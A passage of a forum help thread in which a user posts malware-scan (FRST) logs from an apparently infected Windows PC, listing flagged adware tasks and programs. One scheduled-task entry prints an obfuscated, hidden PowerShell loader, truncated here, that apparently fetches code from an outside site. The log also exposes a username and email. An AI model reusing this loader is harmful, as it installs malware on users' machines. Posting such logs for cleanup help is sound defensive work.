    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Defender
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
    2015-12-09 13:34 - 2015-12-05 23:20 - 00000000 ____D C:\Windows\system32\MRT
    2015-12-09 13:27 - 2015-12-05 23:20 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

    ==================== Files in the root of some directories =======

    2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
    2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
    2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
    2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
    2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
    2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
    2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
    2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2015-12-20 22:31

    ==================== End of FRST.txt ============================
     
  6. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
    Ran by hersheychoco9 (2016-01-05 17:09:21)
    Running from D:\Utilities
    Windows 8.1 (X64) (2014-05-14 03:51:59)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-1030869394-3123877279-975090705-500 - Administrator - Disabled) => C:\Users\Administrator
    Guest (S-1-5-21-1030869394-3123877279-975090705-501 - Limited - Disabled)
    hersheychoco9 (S-1-5-21-1030869394-3123877279-975090705-1001 - Administrator - Enabled) => C:\Users\hersheychoco9

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Roboscan (Enabled - Up to date) {9D201895-DDC4-8A80-AD2D-06BCC9382E61}
    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Roboscan (Enabled - Up to date) {2641F971-FBFE-850E-979D-3DCEB2BF64DC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Roboscan (Enabled) {A51B99B0-97AB-8BD8-8672-AF8937EB691A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.3.0.151 - Adobe Systems Incorporated)
    Adobe Flash Professional CC 2015 (HKLM-x32\...\{31390329-FFF0-11E4-85AD-AF2C4143F080}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Photoshop Elements 11 (HKLM-x32\...\Adobe Photoshop Elements 11) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
    Aliens versus Predator Classic 2000 (HKLM-x32\...\Steam App 3730) (Version: - Rebellion)
    Autodesk SketchBookExpress 2010 R1 (HKLM-x32\...\{426187BC-F500-4208-B3C1-96876EE7FA31}) (Version: 4.12.0001 - Autodesk)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
    Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)
    Color Efex Pro 3.0 Wacom Edition 6 (HKLM-x32\...\Color Efex Pro 3.0 Wacom Edition 6 Stand-Alone) (Version: 3.1.1.1 - Nik Software, Inc.)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.5.63 - Dell Inc.)
    Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
    Dell Product Registration (HKLM-x32\...\{764E68FE-C2F9-410E-90A8-CE7F8B9A36E2}) (Version: 2.03.0204 - Aviata Inc.)
    Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.1.6664.93 - Dell)
    Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.0.5.4 - Synaptics Incorporated)
    Dell Update (HKLM-x32\...\{C87ADBDA-EF36-4A53-B05C-DBCD98D3A2CA}) (Version: 1.4.2000.0 - Dell Inc.)
    Don't Starve Together Beta (HKLM-x32\...\Steam App 322330) (Version: - Klei Entertainment)
    Dragon Nest (HKLM-x32\...\Steam App 11610) (Version: - Eyedentity Games Inc.)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    ffdshow [rev 3154] [2009-12-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
    Game Booster 3 (HKLM-x32\...\Game Booster_is1) (Version: 3.5 - IObit)
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
    Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - Crackshell)
    Hero Siege (HKLM-x32\...\Steam App 269210) (Version: - Elias Viglione)
    How to Survive (HKLM-x32\...\Steam App 250400) (Version: - )
    Insurgency (HKLM-x32\...\Steam App 222880) (Version: - New World Interactive)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
    Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{6882ac6d-e97d-4e25-b3ea-5f3f21055dfe}) (Version: 16.6.0 - Intel Corporation)
    IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.3.0.5 - IObit)
    Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
    Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
    Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)
    Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version: - Tripwire Interactive)
    League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
    League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
    Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    My Game Long Name (HKLM\...\UDK-cf0a7b04-8d44-4d89-bebf-60876b806bed) (Version: - Epic Games, Inc.)
    Nicole (otome version) (HKLM-x32\...\Steam App 307190) (Version: - Winter Wolves)
    NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outlast (HKLM-x32\...\Steam App 238320) (Version: - Red Barrels)
    PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
    Pool Component (HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\{D8814471-E92F-6B47-10E9-0AD81C4D3361}) (Version: 1.6.5 - Beach Download corp) <==== ATTENTION
    PSE11 STI Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.007 - Dell Inc.)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7152 - Realtek Semiconductor Corp.)
    Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )
    Roboscan Internet Security (HKLM\...\Roboscan_is1) (Version: v2.5 - Roboscan Inc.)
    Scribblenauts Unlimited (HKLM-x32\...\Steam App 218680) (Version: - 5th Cell Media)
    SdRt4200 (HKLM-x32\...\{140347A0-4A0C-44FC-9CA1-C8A3471899B7}) (Version: 4.2.8.0 - パルティオソフト株式会社)
    Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
    Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
    Star Wars Jedi Knight: Jedi Academy (HKLM-x32\...\Steam App 6020) (Version: - Raven Software)
    Starbound (HKLM-x32\...\Steam App 211820) (Version: - )
    State of Decay (HKLM-x32\...\Steam App 241540) (Version: - Undead Labs)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version: - CD PROJEKT RED)
    TOXIKK (HKLM-x32\...\Steam App 324810) (Version: - Reakktor Studios)
    Unturned (HKLM-x32\...\Steam App 304930) (Version: - Nelson Sexton)
    Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{15015752-9990-4516-A2B1-93823281FB8E}) (Version: 15.0.1759 - Microsoft Corporation)
    Update for Japanese Microsoft IME Standard Dictionary (HKLM-x32\...\{E75B82FD-B6FD-4653-8685-F3A97BDFEA6E}) (Version: 15.0.2013 - Microsoft Corporation)
    Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{01E87699-A49D-413A-B75B-7C434FEF979C}) (Version: 15.0.2013 - Microsoft Corporation)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.5.0.0 - Azureus Software, Inc.)
    Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.5-3 - Wacom Technology Corp.)
    WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
    WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
    WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
    Wondershare MobileGo ( Version 8.0.0 ) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.0.0 - Wondershare)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-1030869394-3123877279-975090705-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
     
  7. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
    Task: {1942C491-20D1-442F-BC74-6769F1D1280D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    Task: {1D1D0A16-ADA3-40B5-A257-8E6A372FF7F1} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-hershey99999@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-09-04] (Adobe Systems Incorporated)
    Task: {32CB8F3D-72E2-4F26-AF79-830A7A116864} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
    Task: {3855C92B-1AB9-4877-B728-3E166A322521} - System32\Tasks\Genius_Interval => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] ()
    Task: {53C1C984-FAFA-45AF-A299-CC9D47FF50FC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2015-10-29] (PC-Doctor, Inc.)
    Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
    Task: {642B9DD6-2DA0-4C37-82B8-2B043D8E899E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
    Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
    Task: {7AF5A5D6-6314-46CE-A436-82522A94B518} - System32\Tasks\CCleanerSkipUAC => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner.exe [2015-07-17] (Piriform Ltd)
    Task: {7BC0E46C-BFEC-438E-AFA4-ECE363145385} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe [2015-11-07] ()
    Task: {80113A5B-9EE2-4DF6-A1E6-7ED2A1C45754} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
    Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
    Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADYATwBXAEQAegBmAFIAVwBLAEgALQBoAHYANAB1AC0ALQBEADQAUABHAEgAaQBwAF8ANQBWAEUATQBRAHAAegAwAEIASQA0AGwARwBPAHcAMgBuAGMAbQBsAEgAYgBqAGMASgBtAFIAUwBVAE4ATQBOAHcAdwAzAFkAUgBjAFQAWQBTAGwAdwBXAGEAbgBvAGcANgAyAEwAWQBPAEUAUAB1ADMANAA5AE0AaAB4AEsASABvAFcAVABPADkAWgBmAEMAawBJAHkAcQBHAFgAcgB6ADIAUABhAEIAMQBLAFcAaQBkAHYAQwBqAHQAXwBQAEEAOQBYAHEAVgAwAHoAZwAyAHUAVQBJAGcAUgBWAEMAcwByAHEANgA4AEkASAAyAEYAQgA4AGIAWgBUAE4AZgBZAFIAUQBqAHEAYgBHAGYANAB6AGwAOQBjAHUASwBsAEEANQBnAFAALQBnAFMATABKAE4AdQBKAEcAWQBFADkAQQBtAFoAMgBZAG0AWQBTADUAdwB0AEYAZAB1AF8ANABpADIANgBTAGMAQQBUAHcAawBLAFIAWgBKAHIAZABGAE8AWgBoADgARAA2AHkASABMAHQAeQBhAE4ANABBADUAdABqAG0AQQA2AHUAWgBiAGkAcgBmAEsAMgB6AHoAMQBiAEMAeABEAFIAbgA1AEwATgBXAEsANgBKAHEAVABOAFYAbAAzADUATwBwAEEAbwAzADEAaQBqAHEAcgBPAGkAawBPAHcAbgBvAFIATAB6AGQARgBuAE0AQQBrAG8ASQBPAGoATAB2AE8ASgBzADQAVAAtAHgATwA3AE8AZgBvAGwAQgBrAHgAVwB6AEIAWgBpAEMAOABMAFkAagBFADMARAB5AGMARQBIADEAWQAyADIAUwB4AEMAZQBiAHcANgBYAEMAUQAzAGMAWAB5AGIAXwBQAGQAYgAwAFoAUAA1ADEASABKAG4AdQBGAFcAagAwAHoAXwBwAFUAcABsAEQALQBLAFMAbQBoAFkAcQBrAEEAQwBzAEMAQwBZAFUALQBfAEIAYwBjAFkAbQB3AGEAbABuAHYARABRAEMAUABEAC0ARQBVADYARwBUAEUAbgBjAG8AcABmAFAAWQBXAEYAaQBEAG4AVABXADUAZABkAFgAcgA3AFgAcABzADYAQQBmAHkAeABBAFYAZwAwAFIAOQBzAGYAcwBZAHgANABnADkAdAAzAG0AawBrAEkAVQBOAEUAbwBBADEAQQBRADQARQBqAE4ATQAyADEASwBVAEcAUgBaAG8AMQBWAEEAMgBkAHUASABPADUAQwBjADAAOQBuADMAYgBxAHoARABrAG8AVQBIAGYANABxAEgARgBEADEAbQBVAG4ALQBuAEgATABqAG0AbQB6AEwAUwA5AEcATQBwAEEAUwBjAEcAVAB3AHYAaQA5AEwAVwBlADIASwBwADMAegB0AGgASABQAGwAdABiADYAdwBxAF8AdwBTAGsAdABkAFAAYwBTAEsAZAA3AGIAdwBEAGcAbwB0ADIAbAA4AE8AYQB4AFIAYwBWAEcAVwBDAFQAcQAyAGwAMQBwADUATwB4AEcAbgBCAFUATQAxAFIAdQBsAHgAWgBjADYAMQBZAFAARQBnAG4AMAB5AEkAYQB6AEkAVgB6AGYARwBNAC0AagBOAEQAUQBCAE0AdQB3AHAAMgBWAFEAQwB5AE4AOQBHAHoAawBtAG8AeQAyAE0AagAxAEEARABQAHkAYgBUAGwAawBxAFUATAB6AHAAQQBtAGgAZwBuAGwARQA2AFUAOQBWADQAdgB4ADIAUgBHAGoASwBfAFkAUAA4AEcAMwA0AFkANwBoAHcAUQBkAEIAVQBNAFMAQwAyAGYANAAwAGkAeQByAEYANABCADIAMgByAFoAWABoAFQAUgBCAHUAawBwAE0AQwBMAEsAaQBPAGkAagBRAG0AdwBTADMAQwBGAG4AcQBxADUAdAB4AFQAZwB3ADgARQBnAFkANwBUAFgAcwBlAG8AVQBKAHEAUQBtAHoATwBrADEATgBQAHAAVQBsADYAegBkAEUATABLAG8ATgByAHQAWABKAF8AOABtAGEASAAxAHIAMgBNAGEAagBLAFMAcgBJAGsAcQAxAGIANABPAEUAUwBXAHUAawA4AHUAMQBaAHEAQQAxAEwASQBKAHYAYQBqADAAYQBqAHIAVQBFAGYASgB6AGQAUwAtADcAXwB5AFcAMgBfAEgAUwBmAEUAWQB0AG8ANQAyAGQAXwA1AHEAYwBtAHMAegB4AFgAUgBkAFgAOABZAHYAOABIAFAAXwBjAFUALQBTADcAMQBSAEoAZgA0ADIANgA2AEwALQBBAHcAZQBEAE0AMQBrACYAYwA9ADcAaQBlAGgAMwB4AGsAcQB6AEwAUABwAG4AbABrAFoAZgBuAHEANABYADMAOQBoAE4AegAwAHcAdABfAE4AMABPADgAXwAtAHkAdgBDAHAAbwBpAHoANgBXAFcAOABGAEUAdQBvAEkASABZADcAawBqAGgAVgBsAGgASgAtAGwATAAyAHYAUwBtAFcAQQA1AFEAVgAyAG0AUgB5AFMAOABRAEIAeABuAFcAVwByADgAQQBmAGsAXwBXAEUAWQBaAHEASQBvAHkAcQAzAGwAZAByAFYAcQBVAEgAegBzAGgARwBHAHkAdgBsAEUAagA0ADEAMQBXAEoAegBYAFUAYgBDAGEAdgBVAFMAcwBhADUASwBEADMANQBjAHAAdwBBAFUAUgBnAHUAawAzAHIAdgBjAHgANQBJADgAeABSAFMANgBqAGYAZgBLAFcAbwBPADkARAA3ADcAagBfAFMAcwBYAGQAYwBfADUANgBDAEwAUwBZAFYAVwBFAGEAUwBFAFEAVgB4AGsAUABLAHoAUQBIAFkATgBJAHQAcAAzAGoAMABOAGMAUgBIAEEAcABTAEEAbwBwAE0AcwB4AHMASABDAHMAUQAtAFQAbQBjAFMAZQA0AHoAdgBOAFYAagBPAE0AdwA3AHMAdAAwAFAALQBqAEYATwBtAEgASwB4AFUALQBNAG8AdABxAFAASgBnAFgAXwBJADMAVgA2ADYAUwA4AEoAQgBxAEMAbAA1AEMASgB1AH